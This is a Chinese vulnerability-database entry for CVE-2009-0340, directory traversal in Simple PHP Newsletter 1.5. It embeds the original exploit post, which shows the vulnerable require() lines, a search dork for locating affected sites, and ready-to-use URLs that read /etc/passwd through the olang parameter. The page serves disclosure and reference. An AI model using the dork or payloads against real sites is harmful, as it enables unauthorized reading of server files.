Quirm Simple PHP Newsletter多个目录遍历漏洞

漏洞ID	1117252	漏洞类型	路径遍历
发布时间	2009-01-16	更新时间	2009-01-29
CVE编号	CVE-2009-0340	CNNVD-ID	CNNVD-200901-436
漏洞平台	PHP	CVSS评分	6.8

|漏洞来源

https://www.exploit-db.com/exploits/7813
https://cxsecurity.com/issue/WLB-2009010247
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-436

|漏洞详情

SimplePHPNewsletter1.5版本中存在多个目录遍历漏洞。远程攻击者可以借助对(1)mail.php和(2)mailbar.php的olang参数中的".."，读取任意文件。

|漏洞EXP

--:local file include:--
---------------------------------  
script:Simple PHP Newsletter 1.5
   
----------------------------------------------
download from:http://quirm.net/download/23/
   
----------------------------------------------

...............................................
vul:/mail.php line 11:

if(isset($olang)) 
{
require("lang/".$olang); line 11
-------------------------------------------
vul:/mailbar.php line 5:

<?php
include("config.inc.php");
if(isset($olang))
{
require("lang/".$olang); line 5
-------------------------------------------


----------------------------------------------------

dork:"Powered by Simple PHP Text newsletter"
----------------------------------------------------

xpl:

http://127.0.0.1/path/mail.php?olang=../../../../../../etc/passwd

http://127.0.0.1/path/mailbar.php?olang=../../../../../../etc/passwd

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from:[iran]
---------------------------------------------------

# milw0rm.com [2009-01-16]

|参考资料

来源:XF
名称:simplephpnewsletter-mail-file-include(48089)
链接:http://xforce.iss.net/xforce/xfdb/48089
来源:BID
名称:33327
链接:http://www.securityfocus.com/bid/33327
来源:MILW0RM
名称:7813
链接:http://www.milw0rm.com/exploits/7813

Quirm Simple PHP Newsletter多个目录遍历漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

检索漏洞

相关漏洞